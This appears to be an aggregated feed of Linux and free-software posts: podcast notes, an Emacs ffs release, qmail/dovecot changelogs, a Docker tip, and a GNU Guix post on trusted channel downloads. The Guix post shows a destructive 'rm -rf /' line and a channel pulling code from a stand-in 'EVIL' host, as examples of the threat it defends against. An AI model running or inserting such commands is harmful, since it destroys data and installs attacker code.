Why a proposal for an alternative to IPv6 is unlikely to be viable, Microsoft really doesn’t want you to run Exchange Server on-prem, Google will finally stop being a proper search engine, setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Tuning ZFS for Databases

Webinar: May 27th at 11am EDT: Database Performance on ZFS with Tom Lawrence

 

News/discussion

Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6

Exchange Server zero-day vulnerability can be triggered by opening a malicious email

Google Search as you know it is over

 

Free consulting

We were asked about setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Amin Bandali: ffs 0.2.2 released

ffs provides a minor mode for simple plain text presentations in Emacs, where the slides are separated using the page-delimiter, by default the form feed character (^L).

I wrote ffs in early 2022 for my LibrePlanet 2022 presentation the Net beyond the Web, and earlier this year decided to polish it towards being a proper package and submit it to GNU ELPA. The manual still needs some more work, but the overall package is in pretty good shape so I submitted for inclusion in GNU ELPA.

ffs and I owe a debt of gratitude to Protesilaos for rounds of code review and feedback for improving and polishing the package in preparation for submission to GNU ELPA. You can watch videos of these sessions posted earlier on my website:

Further, inspiration for parts of ffs's implementation was gratefully drawn from Protesilaos's Logos package for Emacs.

Dedicated to the loving memory of Farangis Yousefinia.

Below are the release notes.


Version 0.2.2 on 2026-05-21

First release of ffs on GNU ELPA.

The attempted build of ffs 0.2.1 within GNU ELPA build sandbox failed with an Error: void-function (org-texinfo-kbd-macro) due to use of #+macro: kbd (eval (org-texinfo-kbd-macro $1)) in ffs.org for better formatting of key sequences in the exported Texinfo copy. This seems to have happened for the specific case of generating a plain text README using ox-ascii where ELPA didn't load ox-texinfo. To try and mitigate this, a README.md has been added for use as the package README instead of ffs.org. If not sufficient, a Texinfo copy of the ffs manual will be shipped instead of the Org one in the next release.

ffs 0.2.2 also includes small fixes and improvements throughout ffs.el from Stefan Monnier, and additional feedback to be addressed in future releases.

Version 0.2.1 on 2026-05-20

The attempted build of ffs 0.2.0 within GNU ELPA build sandbox failed with a "Cannot include file" error on the "#+include: fdl.org" in the manual. So, as a workaround, we switch to using the official Texinfo copy of the GNU FDL license rather than an Org copy.

Version 0.2.0 on 2026-05-19

First release of ffs intended for GNU ELPA.

After a few years of inactivity, in early 2026 I decided to dust off ffs.el, polish and document it, and offer for inclusion in GNU ELPA as a proper package.

Default value of ffs-default-face-height changed to nil

To minimize unexpected and/or unnecessary changes out-of-the-box, the default value of ffs-default-face-height has been changed to nil.

ffs-edit-buffer-name demoted from user option to variable

This is not an important user-facing setting, so to help avoid overwhelming users with many options, this has been demoted from a user option to a variable.

Several new user options for customizing ffs's behaviour

As part of the effort to bring ffs more in line with the conventions of other existing Emacs packages, the mechanisms for toggling various parts of Emacs's interface to minimize visual clutter were changed from being minor modes to being customizable user options. These are the replacement new user options, with a default value of nil:

  • ffs-hide-cursor
  • ffs-hide-mode-line
  • ffs-hide-header-line

Their value is buffer-local, and may be set globally using setq-default. See the sample configuration in the manual for an example of how to customize them.

The new ffs-page-delimiter user option defines the page delimiter inserted by ffs-edit-done when inserting a new slide. Emacs's page-delimiter regexp should be able to match ffs-page-delimiter's value, so if you use a custom page-delimiter be sure to customize ffs-page-delimiter accordingly.

The new ffs-echo-progress user option controls whether to display in echo area the progress through the slides. When non-nil, changing slides will also display the progress through the slides in the echo area. The format of the displayed progress can be customized using the new ffs-echo-progress-format user option.

The new ffs-edit-display-buffer-alist user option may be used to control the Window configuration for the ffs-edit buffer. By default, it will display the ffs-edit buffer in the same window.

The new ffs-edit-done-hook user option may be used to define hooks to be run at the end of ffs-edit-done after returning to the main ffs presentation buffer.

Lastly, a new ffs-find-speaker-notes-function variable was added to allow customizing the find function used for opening the speaker's notes file, defaulting to find-file-other-frame.

Version 0.1.0 on 2022-05-19

Initial publication of ffs.el as part of my personal configurations for GNU Emacs.

My first attempt at this concept was a now-archived ffsanim.el, a major mode implementation that used Emacs's animate library to animate slide texts onto the screen. Shortly after realizing the shortcomings of that approach, I abandoned it in favour a minor mode implementation and published version 0.1.0 of what is now ffs in my personal configs repository.

I used this implementation for presenting my LibrePlanet 2022 talk, The Net beyond the Web.

I picked "ffs" as the package name, the acronym for form feed slides.

  •  

Installazione di Dovecot e sieve su qmail + vpopmail

Changelog

  • May 14, 2026
    - dovecot 2.4.3 released. Changed dovecot_config_version and dovecot_storage_version in dovecot.conf
    - the new version has lua as a dependency. Added --without-lua at configure command
  • Feb 25, 2026
    - Added Server Name Indication (SNI) settings in sni.conf.template, imported from local.conf commit
    - userdb iterate query nor orders by domain and username commit
    - 15-mailboxes.conf: fts_autoindex = no added to Trash and Junk folders commit
    - 10-auth.conf: + character added to auth_username_chars commit
  • Nov 24, 2025
    - dropped 'enforce = no' from 90-quota.conf to enforce quota limits (commit)
  • Nov 22, 2025
    - quota driver switched to 'count' (commit). 'count' is the recommended way of calculating quota on recent Dovecot installations.
  • Oct 30, 2025
    - dovecot ugraded to v. 2.4.2
  • Mar 29, 2025
    - dovecot updated to v. 2.4.1-4
  • Mar 15, 2025 (config version 2.4.0.1 diff
    - Added quota warnings feature. Improved quota configuration in 90-quota.conf (more info here)
    - Configured auth-master.conf.ext and auth-deny.conf.ext. To be included from local.conf
  • Mar 9, 2025
    - fixed quota calculation in sql queries (tx Hakan Cakiroglu)
  • Feb 22, 2025
    - Bug fix in 90-sieve.conf: global script to move spam into Junk now working
    - Bug fix in move-spam.sieve: erroneously matches "YES" if "BAYES" is in the header
  • Feb 15, 2025
    - added support for vpopmail configured with --disable-many-domains
    - 90-sieve.conf: global script move-spam.sieve called correctly
  • Feb 8, 2025
    - dovecot_postlogin.sh: query changed in order to add new records as well (tx Bai Borko)
    - bug fix: pop3 service was executing imap instead of pop3 (tx Gabriel Torres)
  • Jan 29, 2025
    - dovecot upgraded to v 2.4.0. Old configuration files are not valid anymore and you have to install dovecot from scratch.
  • Nov 15, 2024
    - added a postlogin script to update the vpopmail.lastauth SQL table on login (see 10-master.conf, thanks kengheng)
  • Dec 29, 2023
    default_pass_scheme = SHA512-CRYPT (was MD5-CRYPT) in dovecot-sql.conf.ext, as vpopmail-5.6.x has now SHA512-CRYPT password by default
  • Feb 10, 2023
    - added a patch to restore the old vpopmail-auth driver (tx Ali Erturk TURKER)

  •  

Roundcube webmail

Roundcube è una webmail avanzata con una bella interfaccia grafica.

Changelog

  • Aug 10, 2026
    - version 1.7.3
  • Mar 9, 2025
    added $config['quota_zero_as_unlimited'] = true; to show quota unlimited instead of unknown for accounts with unlimited quota

  •  

Aggiornare qmail

Call for testers

Ho appena tirato su una modifica a tutto il codice di base, mirata a rendere il codice di qmail compatibile con le specifiche C23 e i gli ultimi compilatori GCC e Clang. Sul mio server di produzione funziona senza alcun problema da alcune settimane. La compilazione è stata testatta su linux, freebsd, openbsd, netbsd e con i compilatori GCC fino alla versione 15.2 e Clang fino alla versione 19.1.7. Trattandosi di una modifica importante, prima del rilascio definitivo, chiederei a chi ne avesse la possibilità di collaborare al testing scaicando l'ultima versione come segue

git clone https://github.com/sagredo-dev/qmail.git

Changelog

  • Apr 7, 2026
    - (security) Remote Code Execution via Shell Injection in qmail-remote TLS Error Handler in #42 (tx Diep Pham)
  • Apr 2, 2026
    - qmail-remote auth improvements by pierluigi in #39
    - Fixed DKIM ed25519-sha256 signing and verification to conform to RFC8463 by @agerstla in #40
    - Updated qmail-qfilter to support filters defined in control/qfilters by @agerstla in #41
  • Feb 25, 2026
    - Improved DKIM status handling by @agerstla in #35
    - Ported over DKIM_BAD_IDENTITY support from Indimail (tx Manvendra Bhangui and Andreas Gerstlauer 1299b55)
    - SNI support for qmail-smtpd by @agerstla in #37
    - Added qmail-qfilter by @agerstla in #38
  • Feb 3, 2026
    - Bug fix for verifying multiple DKIM signatures (second one always failed due to a DNS lookup bug). tx Andreas Gerstlaurer #31
    - config-all.sh upgrade #33
    * config-all.sh: moreipme is now populated with IPs in separate lines
    * config-all.sh: rsa dh keys can be created even if the certificate creation is skipped
    * config-all requires to accept overwriting with y/N/a=all options
  • Jan 8, 2026
    - bug fixed in helodnscheck: it allowed domains with only one dot #30
  • Jan 5, 2026
    - helodnscheck.cpp
    : PCRE dependency avoided, to make happy Debian 13 d987ec4
    - config-all now grabs the correct network interface c60d3fa
    - config-all will now prompt for 1024/2048 key length for DKIM c842cea
    - Fixed typo in qmailctl 3f1ea75
    - Makefile: Fixed incorrect rule syntax for 'make cert' 80222cc
  • Sep 8, 2025
    - Fixes in SPP handling and support for [pass] plugins after RCPT accept. Support for RBLRESULT environment variable and RBL ignore ('=') option. (tx Andreas Gerstlauer)
    - Added -std=gnu17 to conf-cc, fixed some other issues and now it compiles on gcc-15.2 in #28
    - scripts/qmail-pop3d and qmail/pop3sd: ports changed to 110 and 995
    - Received: email header now hides the sender's hostname when the sender is RELAYCLIENT or is authenticated. 785e84b
  • Apr 30, 2025
    qmailctl
    , qmHandle, queue_repair and all scripts installed in QMAIL/bin and not in /usr/local/bin by config-all.sh
  • Apr 25, 2025
    - added a configuration script config-all, which configure and installs the control files (as per the original config-fast script), aliases, SRS (uses control/me as the srs_domain), log dirs in /var/log/qmail, tcprules (basic, just to make initial tests), supervise scripts, qmailctl script, DKIM control/filterargs and control/domainkeys dir, SURBL, smtpplugins, helodnscheck spp plugin, svtools, qmHandle, queue-repair, SSL key file (optional).
    Consider this feature as "testing"
  • Feb 11, 2025
    - Several adjustments to get freeBSD and netBSD compatibility. More info in the commit history. Hints/comments are welcome.
    - freeBSD users have to erase the very 1st line of the file "conf-lib", as libresolv.so in not needed on freeBSD.
    - Dropped files install-big.c, idedit.c and BIN.* files.
    - Dropped files byte_diff.c, str_cpy.c, str_diff.c, str_diffn.c and str_len.c, which break compilation on clang and can be replaced by the functions shipped by the compiler (tx notqmail).
    - Old documentation moved to the "doc" dir. install.c and hier.c modified accordingly
    - conf-cc and conf-ld now have -L/usr/local/lib and -I/usr/local/include to look for srs2 library
    - conf-cc and conf-ld now have -L/usr/pkg/lib and -I/usr/pkg/include to satisfy netBSD
    - vpopmail-dir.sh: minor correction to vpopmail dir existence check
    - srs.c: #include <srs2.h> now without path

  •  

Server Name Indication (SNI) per qmail e dovecot

Server Name Indication (SNI) è una estensione del protocollo TLS che consente a un server di presentare differenti certificati a seconda dell'hostname richiesto dal client durante il saluto TLS.

In un ambiente email moderno, molti domini condividono uno stesso indirizzo IP per i servizi SMTP, IMAP, POP3 e submission. Senza SNI, un amministratore di un server email può presentare un solo certificato per ogni socket disponibile, cosa che obbliga l'aministratore ad affidarsi a certificati multi-dominio (SAN) o a certificati con wildcard. Questo approccio aumenta i problemi operativi tra gli utenti finali novelli, che spesso non sono in grado di usare la configurazione automatica del client per configurare correttamente le loro mailbox.

L'abilitazione di SNI nei serivizi mail consente al server di presentare il certificato appropriato basato sull'hostname richiesto dal client, contenuto nel suo indirizzo email.

La funzionalità SNI per la mia distribuzione qmail è stata aggiunta da Andreas Gerstlauer (commit qui e qui), che vorrei ringraziare.

  •  

ClamAV

Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.

Changelog

  • Mar 4, 2026
    - clamav upgraded to v 1.5.2
  • Oct 11, 2025
    - clamav upgraded to v 1.5.0. A recent version of rust is needed (successfully using 1.88 here). Just reinstall as explained below. No particular change is needed in the config files.

  •  

Installare e configurare VPopMail

Vpopmail fornisce un modo semplice di gestire indirizzi di posta su domini virtuali e account email diversi da quelli su /etc/passwd.

Changelog

  • Feb 11, 2026
    - vlimits.c
    : avoids no file found exit when .qmailadmin-limits is not existent because no limits are defined yet (a565779)
    - added sql files to be imported on upgrade to v. 5.6.x (8136480)
  • Feb 8, 2026
    - migliorata la sezione "upgrade"
    - vmysql.c changes (#10)
    • valias_create_table now check if table is already created in order to avoid warnings in dotqmail2valias
    • solved quotes issue in query in valias_insert function
  • Nov 20, 2025
    - vutil: 'isSomething' functions reviewed to satisfy qmailadmin calls in #9
    - Added definition of 'call_onchange' function and cured its calls to avoid break 97ffe38
  • Oct 30, 2025 (v. 5.6.10)
    - Added specific usage informations for s/qmail users (look here)
    - Dropped -std=gnu17 from compilation options and solved (probably) all breaks and warnings on gcc 15.2 2d8526d
    - configure.ac now looks for mariadb include and lib dir in addition to mysql dab36e8
    - configure.ac automatically looks for vanilla qmail's users/cdb and s/qmail's users/assign.cdb file 723efb3
    - Updated the usage() funcion message in vadduser.c to clarify the use of pre-hashed passwords with -e 5b5ccdb
    - control/defaultdelivery is now installed by vpopmail if --enable-defaultdelivery 77f54eb
    - vrcptcheck checks all kind of address (users, forwards, valiases) #7
    - Dropped unused functions in vpopmail.c #8
  • Sep 1, 2025 (v. 5.6.9)
    - added -std=gnu17 to gain compatibility with gcc-15 (PR #6)
    - pw_clear_passwd field enlarged to varchar(128) to create room for long passwords (tx Ricardo Brisighelli) c54688d
  • Mar 29, 2025
    - defaultdelivery
    feature (--enable-defaultdelivery) changes (more info here, commit):
    • vdelivermail is installed by default in .qmail-default of newly created domains with option 'delete' as in the previous version.
    • if no user's valiases and no .qmail are found, then the message is sent to the control/defaultdelivery file, so that dovecot-lda (or whatelse) can store the mail into inbox and execute the sieve rules.
    • if vdelivermail is found in control/defaultdelivery, then it is ignored. The delivery remains in charge to vdelivermail, to avoid loops.
    • v. 5.6.8 is backward compatible. The users having .qmail from previous versions of the defauldelivery feature are not affected by this change.

  •  

vQadmin

VqAdmin è un pannello di controllo su interfaccia web che consente di eseguire azioni che richiedono l'accesso a root — per esempio, aggiungere e cancellare domini.

Come si può vedere, VqAdmin ha una nuova versione con un nuovo aspetto mobile responsive, con tutte le mie vecchie patch incluse (compresa quella di ALI) e diverse correzioni e ripuliture del codice sorgente. Ho risolto tutti i warnings sia di autotools che di gcc e cambiato un paio di cose per poter rifare il tema html (guardare il changelog per maggiori dettagli). Come sempre i contributi nei commenti sono graditi.

PS: anche la parte apache è stata modificata e prima di fare l'aggiornamento è necessario guardare quali modifiche sono necessarie.

Have fun!

Changelog

  • Feb 18, 2026 (v. 2.4.7)
    - domain's users lists valiases too #4
    - bug fix in mod_domain.html: Mailing Lists domain limit was not copied correctly (ecce453)
  • Jan 31, 2026
    - relaylimits added to control files 4c5a859
    - disabled maintainer mode to avoid autotools regeneration on user builds #3
  • Jan 25, 2026
    - Domain's users listed alphabetically by domain and username #2 451da48
    - Dropped simsizelimit control file 868b8b2
  • Dec 06, 2024
    - added a patch to highlight users with restrictions and with admin privileges (PR #1, thanks Bai Borko)
    - added control files notlshosts_auto and tlsserverciphers

  •  

Configurazione di DKIM per qmail

Questa pagina riguarda la patch DKIM inclusa nella mia patch combinata (maggiori informazioni qui). Questo argomento è avanzato ed è consigliabile tornare qui alla fine del tutto.

DKIM fornisce un metodo per validare l'identità di un nome a dominio associato a un messaggio con una autenticazione crittografata. La tecnica di validazione è basata sulla crittografia di una chiave pubblica: Il server che invia l'email aggiunge il nome a dominio al messaggio e vi affigge una firma digitale. Questa chiave è posta nell'intestazione DKIM-Signature: del messaggio. Colui che riceve il messaggio può controllare la validità della chiave pubblica leggendo un record TXT del DNS del dominio associato al messaggio.

Sei invitato a dare un'occhiata alle pagine man a partire da qmail-dkim(8) e spawn-filter(8).

Changelog

  • Jan 29, 2026
    - Bug fix for verifying multiple DKIM signatures (second one always failed due to a DNS lookup bug). tx Andreas Gerstlauer
  • Jul 10, 2025
    added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)
  • Feb 12, 2024
    - v. 1.48: fixed minor bug using filterargs for local deliveries (commit)
  • Feb 6, 2024
    -DKIM patch upgraded to v. 1.47
    * fixed a bug which was preventing filterargs' wildcards to work properly on sender domain
  • Jan 11, 2024
    - version 1.46
    * dk-filter.sh has been dropped. If signing at qmail-remote level, before upgrading, you have to review the configuration as explained below.
    * The variables USE_FROM, USE_SENDER and DKIMDOMAIN have been dropped
    * when signing at qmail-remote level qmail-dkim now has to be called directly by spawn-filter in the rc file. man spawn-filter for more info
    * In case of bounces the signature will be automatically based on the from: field. This will solve issues of DMARC reject by google in case of sieve/vacation bounces.
    * In case of ordinary bounces (mailbox not found, for instance) the bounce domain will be taken from control/bouncehost and, if doesn't exist, from control/me
  • Jan 4, 2024
    - patch upgraded to v. 1.44
    * fixed an issue with filterargs where spawn-filter is trying to execute remote:env xxxxx.... dk-filter. This issue happens when FILTERARGS environment variable is not defined in the qmail-send rc script.
    * dkim.c fix: https://notes.sagredo.eu/en/qmail-notes-185/configuring-dkim-for-qmail-92.html#comment3668 
    * adjustments fo dk-filter and dknewkey man pages
  • Nov 20, 2023
    * The patch now by default excludes X-Arc-Authentication-Results
    * dkim can additionally use the environment variable EXCLUDE_DKIMSIGN to include colon separated list of headers to be excluded from signing (just like qmail-dkim). If -X option is used with dk-filter, it overrides the value of EXCLUDE_DKIMSIGN.
  • Feb 19, 2023 (v. 1.37 upgrade)
    - ed25519 support​ (RFC 8463)
    - multiple signatures/selectors via the enhanced control/dkimkeys or DKIMSIGNDKIMSIGNEXTRADKIMSIGNOPTIONS  DKIMSIGNOPTIONSEXTRA variables
    - domainkey script replaced by dknewkey in order to create ed25519 keys and rsa keys with 1024/2048/4096 bit
    - dropped yahoo's domainkeys support (no longer need the libdomainkeys.a library)
    - man pages revised and enhanced
    - domainkeys directory moved to /var/qmail/control/domainkeys
    - the documentation in this page has been revised. You can find how to sign with the rsa key together with the ed25519 key below.

  •  

Playing with qmail-spp

qmail-spp provides plug-in support for qmail-smtpd. It allows you to write external programs and use them to check SMTP command argument validity. The plug-in can trigger several actions, like denying a command with an error message, logging data, adding a header and much more.

  • Author: Pawel Foremski
  • More info here

Today I played for the first time with an ancient patch for qmail: qmail-spp. I was really impressed for the ease of use and the elegance of its code, which is inserted inside qmail-smtpd.c with a few touches, despite of the many things that it can do when installed and enabled.

It can run a custom plugin in any language and at any level of the smtp session, grabbing the environment variables, writing into stderr or blocking the smtp session with a return error for the sender.

In no time at all I managed to understand its logic and write a small plugin by adapting a c program I wrote for s/qmail a few months ago to check the validity of the recipient.

Of course I decided to add this patch to my combo. I've just modified the way it has to be enabled, just not to bother those who don't want to touch their run scripts. So, while the original patch is enabled by default, I modified things a little bit so that you have to manually enable it by exporting the variable ENABLE_SPP in your run scripts. Therefore the original NOSPP variable is useless.

Have fun!

  •  

Script e cronjob per il sistema di learning e reporting di Spamassassin

Ora che abbiamo preparato i filtri antispam dobbiamo addestrare il nostro sistema bayesiano e inviare i report a Razor, Pyzor e Spamcop.

La cosa più ovvia che può venirci in mente di fare a questo punto è forse quella di lanciare sa_learn e spamassassin --report uno dopo l'altro al click sul bottone "Marca come Spam" della webmail Roundcube (vedere i driver cmd_learn e multi_driver del plugin markasjunk), ma questa scelta ha alcuni svantaggi importanti:

  • il processo di addestramento, la conseguente sincronizzazione del journal e la connessione ai vari network per il reporting può richiedere anche una decina di secondi, un tempo che i nostri utenti non sono disposti ad attendere.
  • cosa anche più grave, quando essi cliccano sul bottone "Marca come Spam" non è sempre detto che si tratti di un vero messaggo di posta indesiderata. Prendiamo ad esempio il classico caso delle newsletter a cui si sono regolarmente iscritti e che non vogliono più leggere, e che decidono di eliminare etichettandole come spamming anzichè inoltrare una regolare richiesta di cancellazione.

E' qundi più corretto eseguire questi due compiti durante la notte per mezzo di un cronjob (primo problema risolto), processando i soli messaggi di vero spam/ham che l'utente ha consapevolmente copiato in una cartella apposita (secondo problema).

  •  

Migrating from Linux-VServer to LXC (Slackware)

Tired of the nightmares of remotely compiling the kernel with Linux-VServer, a software that I'm pleased with despite of some lack of documentation, these days I was playing with LXC, which is included and supported by Slackware and for which the Linux kernel doesn't need any patching because it already embeds the hacks for LXC containers.

To convert an existing Linux-VServer container in a (eventually unprivileged) LXC container you can follow these steps. I assume that you already know  how to create an LXC container; in case you are interested in unprivileged containers take a look to the excellent Chris Willing's guide (a big thanks to him) linked below.

More info:

  •  

Bye bye Drupal

Era ora che riuscissi a liberarmi della vecchia piattaforma Drupal come strumento per questo blog, ma finalmente ho trovato il tempo per migrare il database di Drupal e per riprendere qui la vecchia grafica (solo lo stile, il codice html è mio).

D'altronde, da almeno 15 anni porto avanti lo sviluppo di un mio CMS (basato su php/mariadb), che però originariamente non avevo usato per la mancanza del tempo necessario a costruirmi un tema html.

Ora il sito vive in ambiente Mobile Responsive e soprattutto mi consente di svincolarmi dagli incubi degli aggiormanti di Drupal e dei suoi pacchetti.

La parte sui commenti del presente CMS non è perfettamente collaudata e mi farebbe piacere avere eventualmente dei feedback su ogni problematica, quindi non esitate a scrivermi al riguardo.

Buon divertimento!

  •  

Gary Benson: Docker images by age or size

Files by age, newest first:

ls -lt

Docker images by age, newest first:

docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r

Files by size, largest first:

ls -lS

Docker images by size, largest first:

docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh

Why why why??!

  •  
  •  

Hybrid Cloud Show – Episode 56

We get into some homelab updates. Sean has been consolidating hardware, Gary has been implementing high availability with Proxmox, and Shane has been working hard to get Home Assistant working with Kubernetes, as well as downloading YouTube videos.

 

Shane’s homelab

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with early episodes sometimes

 

 

 

 

 

Subscribe to the RSS feed.

  •  

Amin Bandali: FFS code review and Emacs extensibility with Protesilaos

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/

Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs.

Here is the video recording of our session, which I share with Prot's permission:

You can view or download the full-resolution video from the Internet Archive.

Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:

(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)

Take care, and so long for now.

  •  

2.5 Admins 299: RMAggravation

People trying to return defective hard drives and RAM are finding out why consumer protection laws would be good, GoDaddy accidentally gave someone’s domain name away, and when and how to fix ZFS fragmentation.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Fast Dedup Economics: When Deduplication Beats Buying New Disks

 

News/discussion

Toshiba refuses to replace large hard drive that was under warranty — company offers refund at the purchase price, not the higher current retail price

GoDaddy Gave a Domain to a Stranger Without Any Documentation

 

Free consulting

We were asked about when and how to fix ZFS fragmentation.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

gnutrition @ Savannah: GNUtrition 0.33.0rc2 Now Available

A test release of GNUtrition, 0.33.0rc2, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release makes some fixes to the gender option.  It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:


Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

  •  

GNU Guix: Time travel without borders

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure� evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

  • they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
  • or, they are the channels currently in use, as returned by guix describe.

This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channel� rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

